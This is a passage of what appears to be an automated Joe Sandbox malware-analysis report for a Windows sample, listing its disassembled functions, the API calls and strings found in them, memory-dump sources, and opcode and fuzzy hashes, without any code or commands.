                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$CurrentProcess
                                                                                            • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                                                            • API String ID: 2190909847-396321323
                                                                                            • Opcode ID: 18d9b9cbb9022c572f667a8ff2d74217ed9ab11c10daef8dedfee69eefcb0c60
                                                                                            • Instruction ID: 2fbe4dacfc4c51687b6ba73e70277ac5a439a698af30b7cf439eeb973a25373a
                                                                                            • Opcode Fuzzy Hash: 18d9b9cbb9022c572f667a8ff2d74217ed9ab11c10daef8dedfee69eefcb0c60
                                                                                            • Instruction Fuzzy Hash: 3B112232E01629AFDF11AF70DD45A6E3B64FF00B60F10812AFC255F291DA789E438690
                                                                                            Function 00A3B991 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • _swprintf.LIBCMT ref: 00A3B9B8
                                                                                              • Part of subcall function 00A34092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00A340A5
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: __vswprintf_c_l_swprintf
                                                                                            • String ID: %c:\
                                                                                            • API String ID: 1543624204-3142399695
                                                                                            • Opcode ID: 32a528b3a54b8b88ba553c0adc62f63b4ddb22fbadb5ff14b950dc1f36ad9686
                                                                                            • Instruction ID: b429259e379ce381e4a3acef343717c2d632eec6ebcebd27afc7af320299f938
                                                                                            • Opcode Fuzzy Hash: 32a528b3a54b8b88ba553c0adc62f63b4ddb22fbadb5ff14b950dc1f36ad9686
                                                                                            • Instruction Fuzzy Hash: 8A01F5639147117A9A306B758C42E6BA7ADEE967B1F40880AFA44D7092EB34D85483F1
                                                                                            Function 00A4101F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateThread.KERNEL32(00000000,00010000,00A41160,?,00000000,00000000), ref: 00A41043
                                                                                            • SetThreadPriority.KERNEL32(?,00000000), ref: 00A4108A
                                                                                              • Part of subcall function 00A36C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00A36C54
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: Thread$CreatePriority__vswprintf_c_l
                                                                                            • String ID: CreateThread failed
                                                                                            • API String ID: 2655393344-3849766595
                                                                                            • Opcode ID: e81c8d8f1e03401efbb52dff9599cf4af7cdb21a50edc4d6ddbbb415d3b14312
                                                                                            • Instruction ID: 4708468d58fc2f5245c7ec31f7ca5cd910634c8b8535388f29cf390299294f97
                                                                                            • Opcode Fuzzy Hash: e81c8d8f1e03401efbb52dff9599cf4af7cdb21a50edc4d6ddbbb415d3b14312
                                                                                            • Instruction Fuzzy Hash: 6201FEB93443097FD3309F689D52B7673A8FBC0751F20442DF64656180DAF16CC64624
                                                                                            Function 00A31316 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00A3E2E8: _swprintf.LIBCMT ref: 00A3E30E
                                                                                              • Part of subcall function 00A3E2E8: _strlen.LIBCMT ref: 00A3E32F
                                                                                              • Part of subcall function 00A3E2E8: SetDlgItemTextW.USER32(?,00A6E274,?), ref: 00A3E38F
                                                                                              • Part of subcall function 00A3E2E8: GetWindowRect.USER32(?,?), ref: 00A3E3C9
                                                                                              • Part of subcall function 00A3E2E8: GetClientRect.USER32(?,?), ref: 00A3E3D5
                                                                                            • GetDlgItem.USER32(00000000,00003021), ref: 00A3135A
                                                                                            • SetWindowTextW.USER32(00000000,00A635F4), ref: 00A31370
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                                                            • String ID: 0
                                                                                            • API String ID: 2622349952-4108050209
                                                                                            • Opcode ID: ab60e91115133d0e1e844e325d50d6c3984673a8d2f99939d63f175f41e1c7dd
                                                                                            • Instruction ID: 6679e4df68836f298b71802437413acbcb2f75ad1e65b4f13b61c7f84cdc01d5
                                                                                            • Opcode Fuzzy Hash: ab60e91115133d0e1e844e325d50d6c3984673a8d2f99939d63f175f41e1c7dd
                                                                                            • Instruction Fuzzy Hash: 00F0C23420438CAADF554FA0CC0DBEA3BACEF40344F048218FC48595A1CB74CA99EB50
                                                                                            Function 00A40FE4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,00A41206,?), ref: 00A40FEA
                                                                                            • GetLastError.KERNEL32(?), ref: 00A40FF6
                                                                                              • Part of subcall function 00A36C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00A36C54
                                                                                            Strings
                                                                                            • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00A40FFF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                                                            • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                            • API String ID: 1091760877-2248577382
                                                                                            • Opcode ID: cf00994c4006095dd4f26045e2bfbd3c13f9a3c46f4a734321ab9ffbd89b2efd
                                                                                            • Instruction ID: cd299a2e070cba10f64a2f0b39563259c333d85efb4e78b254d900588d44c675
                                                                                            • Opcode Fuzzy Hash: cf00994c4006095dd4f26045e2bfbd3c13f9a3c46f4a734321ab9ffbd89b2efd
                                                                                            • Instruction Fuzzy Hash: E1D02E725081203ACA103328AD0AC6F3C249F62332F218B04F039642E2CB290D834292
                                                                                            Function 00A3E29E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNEL32(00000000,?,00A3DA55,?), ref: 00A3E2A3
                                                                                            • FindResourceW.KERNEL32(00000000,RTL,00000005,?,00A3DA55,?), ref: 00A3E2B1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: FindHandleModuleResource
                                                                                            • String ID: RTL
                                                                                            • API String ID: 3537982541-834975271
                                                                                            • Opcode ID: 19a3d7be9f0f27fc9fd9546e612439b71b745a4dd705ef7b61abbae623c03ea8
                                                                                            • Instruction ID: a383c82328c267f741d36b7a324648cba7d7f6e839108fc8f04592fd781118d2
                                                                                            • Opcode Fuzzy Hash: 19a3d7be9f0f27fc9fd9546e612439b71b745a4dd705ef7b61abbae623c03ea8
                                                                                            • Instruction Fuzzy Hash: 55C0123224071076EE30A7E46C0DB836A686B10B55F0A0848F281EA6D1DAF6C98B86A0

                                                                                            Executed Functions

                                                                                            Function 00007FFD9BAA0D47 Relevance: 1.5, Strings: 1, Instructions: 267COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2526364674.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffd9baa0000_serverDll.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 5[_H
                                                                                            • API String ID: 0-3279724263
                                                                                            • Opcode ID: 14439f700a3c31940bc4639312739e9ea1105690af3480f3118822316a345efa
                                                                                            • Instruction ID: 9e6a2d2221a98b4b2fdf291efd2e8597180e8cf80421a00a29cb3729ece2b0cb
                                                                                            • Opcode Fuzzy Hash: 14439f700a3c31940bc4639312739e9ea1105690af3480f3118822316a345efa
                                                                                            • Instruction Fuzzy Hash: A491E072A1DA894FE799DB6C88657E87FE1EF99314F0101BFD049DB2E6CAB819018740
                                                                                            Function 00007FFD9BE689A2 Relevance: .4, Instructions: 408COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2955154057.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffd9be60000_serverDll.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4668b147b012b846e4f8028ad60e1d4f12edb644e69454d1fd9ebe4f554ec478
                                                                                            • Instruction ID: 7d92821454131f7624e657dd79115e13e63186c0b56e6f94da5e9244b1faec91
                                                                                            • Opcode Fuzzy Hash: 4668b147b012b846e4f8028ad60e1d4f12edb644e69454d1fd9ebe4f554ec478
                                                                                            • Instruction Fuzzy Hash: F0D13770B0E94DCFE7B8DB6888655B437D4FF48314B0502BAD45EC71F2EE1AA9068782
                                                                                            Function 00007FFD9BE64C25 Relevance: 2.0, Strings: 1, Instructions: 782COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2955154057.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffd9be60000_serverDll.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: d
                                                                                            • API String ID: 0-2564639436
                                                                                            • Opcode ID: 19831253ee569fa343c6d95edb8303cd3dac266aeb55813946acae46e0f9e07d
                                                                                            • Instruction ID: f1e29d3d5ab8a6a56fa53a9c4ce5d60d8d06b7ff9fb91ac8f2ca031f0d88bf85
                                                                                            • Opcode Fuzzy Hash: 19831253ee569fa343c6d95edb8303cd3dac266aeb55813946acae46e0f9e07d
                                                                                            • Instruction Fuzzy Hash: F0324631B0DB4A8FE728DB5888A59B577E0EF55314B1402BED48ACB1A7DE25F843C781
                                                                                            Function 00007FFD9BE62328 Relevance: 1.4, Strings: 1, Instructions: 160COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2955154057.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffd9be60000_serverDll.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID: 0-3916222277
                                                                                            • Opcode ID: 9ab6dbe3f40c250273b22b71c100cc51e406993e6f46aba1fdb1ba73bab625a0
                                                                                            • Instruction ID: 6bc81233bf9ffaa640201487e9ef40dd559a711be5202a143f8c743461cfca54
                                                                                            • Opcode Fuzzy Hash: 9ab6dbe3f40c250273b22b71c100cc51e406993e6f46aba1fdb1ba73bab625a0
                                                                                            • Instruction Fuzzy Hash: E9517B31E0960E8FDB69DBD8C4656BCB7B1FF49300F1141BEC01AE72A6CA392A01CB50
                                                                                            Function 00007FFD9BE6B968 Relevance: 1.4, Strings: 1, Instructions: 155COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2955154057.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffd9be60000_serverDll.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID: 0-3916222277
                                                                                            • Opcode ID: 3f52ab7263dc416eaed5ffd42ad0a8950ad8d2f5081c6c09c280d52d35208663
                                                                                            • Instruction ID: 45043dbef3fd0c0a83fc838d42863d1ed11a613ad9b62febb54e205cb3a2b4fc
                                                                                            • Opcode Fuzzy Hash: 3f52ab7263dc416eaed5ffd42ad0a8950ad8d2f5081c6c09c280d52d35208663
                                                                                            • Instruction Fuzzy Hash: 4A516075E0994ECFDB59DBA8C4665BDB7B1FF59300F1141BED01AE72A2CA352A01CB40
                                                                                            Function 00007FFD9BE602A0 Relevance: .7, Instructions: 697COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2955154057.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffd9be60000_serverDll.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 15ae1a9d3e925b54d033bda44350c2e1241f0623c366a220ced7250b019ee520
                                                                                            • Instruction ID: 5c07b2b1244405cdce3f3acdef6968fb51b365ffe79c38d9d57ee50cd664db35
                                                                                            • Opcode Fuzzy Hash: 15ae1a9d3e925b54d033bda44350c2e1241f0623c366a220ced7250b019ee520
                                                                                            • Instruction Fuzzy Hash: 3032B530B09A1DCFDBA8DB58C8A5AB877E2FF54711B1101B9D00EC72A7DE25AD45CB80
                                                                                            Function 00007FFD9BE61386 Relevance: .5, Instructions: 507COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2955154057.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffd9be60000_serverDll.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7886ee3e8b8249d200607b3cd412f33124e142ce2d2431eb7d96db0284dbd04e
                                                                                            • Instruction ID: 6134f4713c797d07d641f39a945eee11b13276886c3ffa9ad66ad0c5059686e5
                                                                                            • Opcode Fuzzy Hash: 7886ee3e8b8249d200607b3cd412f33124e142ce2d2431eb7d96db0284dbd04e
                                                                                            • Instruction Fuzzy Hash: 8BE14831B0E74A8FE33A9A68946517D7BE4EF55310F15117EE08FC31A2DE29B9428783
                                                                                            Function 00007FFD9BE6A9D6 Relevance: .5, Instructions: 486COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2955154057.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffd9be60000_serverDll.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d5d8c1c7fa402c88028901f4c59d02af2a6d05e277e81eeed1eb7444380d912e
                                                                                            • Instruction ID: 31ff7cd607b90c29eb1f73c03f6818fc2fb711fa27d4fce28f429aa808dd582c
                                                                                            • Opcode Fuzzy Hash: d5d8c1c7fa402c88028901f4c59d02af2a6d05e277e81eeed1eb7444380d912e
                                                                                            • Instruction Fuzzy Hash: 59E13730F0DA4E8FE3389A6894655757BE4EF46310F16157EE48EC31A3DE2AA9428741
                                                                                            Function 00007FFD9BE6CC21 Relevance: .4, Instructions: 432COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2955154057.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffd9be60000_serverDll.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 6cc6f9bb79acb39888fc24a382fc7a5ca948722f2a82eb4fc75cd3475ac9ab53
                                                                                            • Instruction ID: c2d307f5060ee7efd7382cdb44b3e07213a47511e74a3e1ae0022012b3e12c1c
                                                                                            • Opcode Fuzzy Hash: 6cc6f9bb79acb39888fc24a382fc7a5ca948722f2a82eb4fc75cd3475ac9ab53
                                                                                            • Instruction Fuzzy Hash: D7E10330B0EB4ACFD368DB68C4A45757BE5FF44304B1545BEC48BC76A2DA2BB9428781
                                                                                            Function 00007FFD9BE6259F Relevance: .4, Instructions: 425COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2955154057.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffd9be60000_serverDll.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 6235a08a5c7008774d178f91f200dfeb99a8e0def82900f56833cf127b1d94c4
                                                                                            • Instruction ID: c0afa641c332b72bff39062bfefcaf676ce22d08a429f07c19c7ed1e39acd8fd
                                                                                            • Opcode Fuzzy Hash: 6235a08a5c7008774d178f91f200dfeb99a8e0def82900f56833cf127b1d94c4
                                                                                            • Instruction Fuzzy Hash: A6F1D530A1964ACFEB58CF98C4E16B437A5FF55310B5141BDC84ACB69BCA39F982CB41
                                                                                            Function 00007FFD9BE6BBFF Relevance: .3, Instructions: 335COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2955154057.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffd9be60000_serverDll.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f16baa66769c01dd209d3435ed3814e15a79e67b9f7cbf131bbb55c4dcf66f89
                                                                                            • Instruction ID: 43f3240d792564d2b41a6bfc26940da04737e557145df2eee846d52a2f3a8672
                                                                                            • Opcode Fuzzy Hash: f16baa66769c01dd209d3435ed3814e15a79e67b9f7cbf131bbb55c4dcf66f89
                                                                                            • Instruction Fuzzy Hash: 6EC1F27062994ACFEB5CCF68C4E15B137A5FF45304B5145BDC84B8B6ABCA39E941CB80
                                                                                            Function 00007FFD9BE625BF Relevance: .3, Instructions: 335COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2955154057.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffd9be60000_serverDll.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4437c09b56f9b0d57c0627e95de4307bd3c0ba27dbba8a6fe137ba69a98fa7c6
                                                                                            • Instruction ID: b2e2ba0c2458de34b58de8790e6f78f4c4618d53920f23d90cfd77e787e6a51f
                                                                                            • Opcode Fuzzy Hash: 4437c09b56f9b0d57c0627e95de4307bd3c0ba27dbba8a6fe137ba69a98fa7c6
                                                                                            • Instruction Fuzzy Hash: 68C1D13061A64ACFEB1CCF84C4E05B137A5FF95310B1545BDC89B8B69ACA39F582CB40
                                                                                            Function 00007FFD9BE6B4EA Relevance: .3, Instructions: 310COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2955154057.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffd9be60000_serverDll.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7a99a4b71a0f0c8c95dd28ea9f75656d179a0933b04448ec209e4e27f75c4736
                                                                                            • Instruction ID: 318d8ab1f8955aaabea61bc25cb8ea6963ddd35b8f9535344bc0151c9b7d59e5
                                                                                            • Opcode Fuzzy Hash: 7a99a4b71a0f0c8c95dd28ea9f75656d179a0933b04448ec209e4e27f75c4736
                                                                                            • Instruction Fuzzy Hash: 83B11634A0EE4A8FE759DB78C0B26A477A5FF15300F0542B9C04ECBA97DB29B951C790
                                                                                            Function 00007FFD9BE61EAA Relevance: .3, Instructions: 308COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2955154057.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffd9be60000_serverDll.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e0d33b9a9ce5e505ed641fc4be2b6661043a3014c5b6712d5fb8d89ba40642e9
                                                                                            • Instruction ID: 334012292a8e3c19ba41f9b5a5b82be62b18a1aa85617b78456ff504f0c2074f
                                                                                            • Opcode Fuzzy Hash: e0d33b9a9ce5e505ed641fc4be2b6661043a3014c5b6712d5fb8d89ba40642e9
                                                                                            • Instruction Fuzzy Hash: 85B12770B0EA4ADFE759DFA8C0A05B4B7A0FF14300F4541B9C04EC7AA6CB29B951C781
                                                                                            Function 00007FFD9BE68E67 Relevance: .3, Instructions: 307COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2955154057.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffd9be60000_serverDll.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f502fbed55226d341f7bdd6b19f8f0b4526c3ab0d588f16ff95b755db059cc85
                                                                                            • Instruction ID: b1eeba45ba33d753dde114c1cfda0eb1c4674d48e041c24b799361e6139d30ba
                                                                                            • Opcode Fuzzy Hash: f502fbed55226d341f7bdd6b19f8f0b4526c3ab0d588f16ff95b755db059cc85
                                                                                            • Instruction Fuzzy Hash: F321D11AF0F59FCEF7B462A86C394F81A489F59335F1A027BD45F8A0E39C0E2A455281
                                                                                            Function 00007FFD9BE6BBDF Relevance: .3, Instructions: 296COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2955154057.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffd9be60000_serverDll.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 36aa4f468859ca31911059bf20912db3a196e277a759c34837a350eb016a5017
                                                                                            • Instruction ID: d09ae3e9e19e8ac95df93811692450d7e5592a857710dff37506395316bbbda3
                                                                                            • Opcode Fuzzy Hash: 36aa4f468859ca31911059bf20912db3a196e277a759c34837a350eb016a5017
                                                                                            • Instruction Fuzzy Hash: A2B1D074619A49CFEB58CF18C4E11B137A5FF49314B5142BDC84A8B69BCB39E982CB80
                                                                                            Function 00007FFD9BE6E9D8 Relevance: .2, Instructions: 235COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2955154057.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffd9be60000_serverDll.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 143e0ec11b5be3d4332fa6e29b2cdbe25b5bde9e27cf177d06e432f446a017ec
                                                                                            • Instruction ID: 3cc37dcfc98b4979c73a64305285891d6c3fad3ccd7a61a82b981a8234bd25d6
                                                                                            • Opcode Fuzzy Hash: 143e0ec11b5be3d4332fa6e29b2cdbe25b5bde9e27cf177d06e432f446a017ec
                                                                                            • Instruction Fuzzy Hash: 19612970B0D74A4FE32C9E6898651B577E4EF8A315F11017EE4CEC72A2DE25B9428782
                                                                                            Function 00007FFD9BE635E1 Relevance: .2, Instructions: 229COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
